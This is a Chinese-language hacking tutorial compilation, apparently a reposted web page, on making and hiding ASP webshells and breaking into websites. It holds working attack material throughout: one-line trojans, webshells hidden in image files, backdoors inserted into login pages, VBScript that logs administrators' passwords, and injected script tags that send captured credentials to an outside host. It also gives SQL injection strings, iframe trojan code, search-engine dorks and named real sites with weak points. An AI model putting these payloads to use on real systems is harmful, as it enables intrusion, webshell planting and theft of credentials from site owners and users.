让你变成ASP木马高手

1.名称:如何制作图片ASP木马 (可显示图片) 
建一个asp文件,内容为<!--#i nclude file="ating.jpg"--> 
找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为 
了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入 
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT>

2. 名称:整蛊网吧 
先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享,

复制一个木马过去运行即可。

3.名称:感受MD5暴力破解的魅力 
rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all" 
1和7代表密码最小和最大长度 
阿汀我再加个方法:http://md5.rednoize.com/ 在线破解 
或者到http://www.md5lookup.com/?category=01-3&;searck=on

4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳

的时候最好多选择不知名的加壳软件

5.名称:隐蔽的插入型ASP木马 
(1)在我们要做手脚的asp文件里加入如下内容 
<%if request("action")="ok" then%> 
shell代码插在这里,最好是小马,还要加密一下 
<%end if%> 
访问的时候在你作手脚的asp文件后面加上?action=ok,即可 
(2)另一种方法,在我们要做手脚的asp文件里加入如下内容 
<% 
on error resume next 
strFileName = Request.QueryString("filer") 
set objStream = Server.createObject("ABODB.Stream") 
objStream.Type = 1 
objStream.Open 
objStream.LoadFromFile strFileName 
objStream.SaveToFile Server.mappath("ating.asp"),2 
%> 
访问的时候在做手脚的asp文件后面加上?filer=XXX 
XXX为你本地上传的一个路径如 c:ating123.asp 
上传后在做手脚的asp的同文件夹中有ating,asp 
(3)前提得到system权限, 
进入网站目录下一层 
mkdir s… 
copy ating.asp s…/ 
这样杀毒软件找不到的 
访问http://网站/s…/ating.asp即可

6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户 用户名为:

hack 密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的

7.名称:QQ群脚本攻击 
打开qq对话诓,复制消息,然后 
下面的内容保存为.vbs 文件,运行即可 
Set WshShell= WScript.createobject("WScript.Shell") 
WshShell.AppActivate "QQ信息攻击脚本" 
for i=1 to 20 
WScript.Sleep 1000 
WshShell.SendKeys"^v" 
WshShell.SendKeys i 
WshShell.SendKeys "%s" 
Next

8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可

9. 名称:全面找出你站上的ASP木马 
(1) 用杀毒软件 
(2) 用FTP客户端软件,点"工具"->"比较文件夹" 
(3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马 
(4) 用工具Beyond Compare

10名称:拓展思路拿DVBBS帐号 "一个人的圣经"的动画 
(1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样 
老办法: 
修改admin_login.asp得到明文DVBBS后台密码 
在"username=trim(replace(request("username")这行后面 
Dim fsoObject 
Dim tsObject 
Set fsoObject = Server.createObject("Scripting.FileSystemObject") 
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) 
tsObject.Write CStr(request("password")) 
Set fsoObject = Nothing 
Set tsObject = Nothing 
只要管理员登陆后台,在目录下就生成了laner.txt 
(2)login.asp中Case "login_chk"下: 
on error resume next 
Dim rain 
set rain=server.createobject("adodb.stream") 
rain.Type=2 
rain.CharSet="gb2312" 
rain.Position=rain.Size 
rain.Open 
rain.LoadFromFile server.MapPath("laner.asp") 
rain.writetext now&request("username")&"text:"&request("password")&chr(10) 
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing 
这样laner.asp将获得全部登陆人的登陆时间,用户名和密码 
(3)如果你有自己的网站或者另外的webshell(强烈建议使用): 
可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp: 
<%if request("n")<>"" and request("p")<>"" then 
on error resume next 
Dim rain 
set rain=server.createobject("adodb.stream") 
rain.Type=2 
rain.CharSet="gb2312" 
rain.Position=rain.Size 
rain.Open 
rain.LoadFromFile server.MapPath("laner.asp") 
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10) 
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing 
end if%>

11. 名称:利用QQ在线状态抓鸽子肉鸡 
生成qq在线状态,把里面的地址改成木马地址,发到论坛 
在login.asp那里插入一句: 
response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username")

&""&"&p="&request("password")&"></script>" 
response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username")

&""&"&p="&request("password")&"></iframe>" 
结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里

12. 动画名称:媒体中国整站程序存在多处漏洞 
漏洞程序:媒体中国整站程序(第一版) 
官方网站:http://meiti.elgod.com/ 
漏洞: %5c(暴库) 上传 注入 
上传页面:down1/upload.asp

13. 名称:免费电话+MSH命令行工具 
http://www.globe7.com/ 打开主页,点击坐下角,Free DownLoad,下载到本地,安装, 
运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时

0.01/分,你就有100分钟可以白打。是一个帐号哦。 
要注意的就是,固定电话,小灵通 形式为0086521123456 521本来时0521,要省略前面的零,手机号也

是一样。

14. 名称:Bo-Blog的新漏洞 
http://网址/index.php?job=../admin/ban 
把其中"禁止搜索的词"那部分<table>另存出来,里面的地址改完整,插入一句话木马

15. 名称:钩魂者入侵传奇私服 
用百度 搜索 传奇 inurl:tuku 
或者 传奇 inurl:wplm.htm 
再或者 传奇 inurl:coolsites.asp 
友情链接里插入一句话木马即可

16. 程序: 宏达企业整站上传漏洞 
官方主页:http://www.mu126.com/ 
漏洞页面:/cx/upfile.asp (上传漏洞)

17.无间盗邮箱,在修改密码里,用户名和密码里添or=or

18.名称: bbsxp5.16后台得到webshell 
bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并禁

止了修改数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。

19.名称:JHACKJ 2005年最新精典教程 
下载看看吧,不错,各大网站都有

20.名称:省力入侵韩国肉鸡 
在啊D的扫描注入点项,打开这个:http://www.google.co.kr/advanced_search?hl=zh-CN 
这是高级搜索项,关键字随便写。这里我写asp?name= 设置为每页显示100条。 
语种选择韩文。搜索,很多sa.

21.名称:任何网吧的管理系统破解 
选智能ABC,然后vv输入,光标后退两步,按delete键 刚输入的两个vv删除 
最后按Inter键

22.名称:破解QQ空间插入网页木马的代码 
现在腾讯 已经封了很多QQ空间代码了 就如 以前 <iframe src="木马地址" name="lcx" width="0"

height="0" frameborder="0"></iframe>插入网页木马的代码也早被封了 
突破禁用的方法 代码如下: 
<div id=DI><img src="javascript :DI.innerHTML=\<iframe src=木马地址 width=190 height=190

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\"

style=display:none></div>

最后附上 卡拉是条ok 总结的 
1.上传漏洞[不多讲] 
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现"请登陆后使用",80%就有漏洞了! 
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞[不多讲] 
pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令: 
http://注入网址;update admin set password=\新MD5密码\ where password=\旧MD5密码\--

[admin为表名.]

3.旁注,也就是跨站. 
我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个

站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经

过加密,这就看我们的本事了

4.暴库:把二级目录中间的/换成%5c 
EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=职责范围&BigClassType=1 
如果你能看到:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一个有效的路径。 确定路

径名称拼写是否正确,以及是否 连接到文件存放的服务器。 
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.

5.\or\=\or\这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有: 
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a

6.社会工程学。这个我们都知道吧。就是猜解。 
 EY:http://www.neu.edu.cn/waishi/admin 
admin waishi

7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本. 
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话

木马

8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改. 
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp 
这个站用的是:杰出校友录,源码我下过了, 
默认数据库/webshell路径:databaseliangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是

admin

9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL. 
/Databackup/dvbbs7.MDB 
/bbs/Databackup/dvbbs7.MDB 
/bbs/Data/dvbbs7.MDB 
/data/dvbbs7.mdb 
/bbs/diy.asp 
/diy.asp 
/bbs/cmd.asp 
/bbs/cmd.exe 
/bbs/s-u.exe 
/bbs/servu.exe 
工具:网站猎手 挖掘鸡 
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB

10.查看目录法:人一些网站可以断开目录,可以方问目录。 
EY:http://www.ujs168.com/shop/admin/ 
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ 
这样我们可以找到数据库,下载不用我教吧

11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[这种方法可以取得大量的WEBSHELL]

12.搜索引擎利用:

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ 
(2).找网站的管理后台地址: 
site:xxxx.comintext:管理 
site:xxxx.comintitle:管理 <关键字很多,自已找> 
site:xxxx.cominurl:login 
(3).查找access的数据库,mssql、mysql的连接文件 
allinurl:bbsdata 
filetype:mdbinurl:database 
filetype:incconn 
inurl:datafiletype:mdb 
我主不做了。。自已做做吧。。

13.COOKIE欺骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。

这个我就不多讲了

14.利用常见的漏洞:如动网BBS 
EY:http://js1011.com/bbs/index.asp 
可以先用:dvbbs权限提升工具,使自已成为前台管理员。 
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert

取得Cookies/NC包 
这个我就不做了,网上教程多的是,自已下个看看。 
工具:dvbbs权限提升工具 动网固顶贴工具

15.还有一些老漏洞。如IIS3,4的查看源码,5的delete 
CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

(0)

相关推荐

  • 让你变成ASP木马高手

    1.名称:如何制作图片ASP木马 (可显示图片)  建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->  找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为  了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入  <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(

  • 防止ASP木马在服务器上运行

    如果您的服务器正在受ASP木马的困扰,那么希望这篇文章能帮您解决您所面临的问题. 目前比较流行的ASP木马主要通过三种技术来进行对服务器的相关操作. 一.使用FileSystemObject组件 FileSystemObject可以对文件进行常规操作 可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字,如:改为FileSystemObject_ChangeName 自己以后调用的时候

  • 如何防范ASP木马

    修改三个组件来达到防asp木马攻击.FileSystemObject组件---对文件进行常规操作.WScript.Shell组件---可以调用系统内核运行DOS命令.Shell.Application组件--可以调用系统内核运行DOS命令. 一.使用FileSystemObject组件 1.可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字,如:改为FileSystemObject_

  • asp木马代码解密的随机加密webshell

    随机加密webshell,解密还不错,应当免杀 加密源码 复制代码 代码如下: <%@ LANGUAGE = VBScript.Encode %> <%#@~^3A4CAA==@#@& jdDhl/k'r1v2FX!ZFE~,PP,~P,@#@&sHC:'r随机加密 J~P~~@#@&jkDnj"SxE4YY2lJzAhS 4l^0+MRmK:r~P,P~P,P~@#@&ZWazDbotDxEbUn木马随机加密器 rP~P~~,P~P,~P,

  • 有效防止ASP木马上传运行—小知识[网络安全技术]

    一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一 前使用IIS服务器的站长很多,特别是对于ASP网站来说,防止ASP木马成了网站安全最关键的内容. 一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一定程度上有效防止ASP木马的入侵 一.使用FileSystemObject组件 FileSystemObject可以对文件进行常规操作 可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scr

  • 两个非常规ASP木马(可躲过扫描)

    hanxiaolian 为了躲避 lake2 ASP站长管理助手而写.. 一.绕过lake2 Asp木马扫描的小马 复制代码 代码如下: <% set c = CreateObject("ADOX.Catalog") c.create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("a.asp")) set c = Nothing c&Serve

  • 隐藏ASP木马后门的两种方法

    1.建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非标准目录:rmdir images..\ /s 2.Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的: mkdir 

  • 一款不错的asp木马 黑色界面

    <% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617"                           '密码 mName="BY:.尐飛"           '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责"       '版权 Server.ScriptTimeout=9

  • 淘特ASP木马扫描器的代码

    +-----------------+ |淘特ASP木马扫描器| +-----------------+ 本程序可以扫描服务器上的所有指定类型(asp,cer,asa,cdx)的文件,查出可疑的木马程序.系统采用扫描程序与病毒库分离的形式, 以后升级只需像杀毒软件那样升级病毒库就可以了.目前可以查杀所有流行的ASP木马程序. 系统提供了全站扫描.按文件夹和指定文件扫描三种扫描方式,如果网站文件比较少的话,推荐使用"全站扫描",如果文件比较多,推荐 使用按文件夹扫描.扫描过程,系统会记录

  • 雷客图ASP站长安全助手的ASP木马查找功能

    可以在线查找空间里的asp木马 复制代码 代码如下: <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <% '设置密码 PASSWORD = "jb51net" dim Report if request.QueryString("act")="login" then     if request.Form("pwd") = PASSWO

随机推荐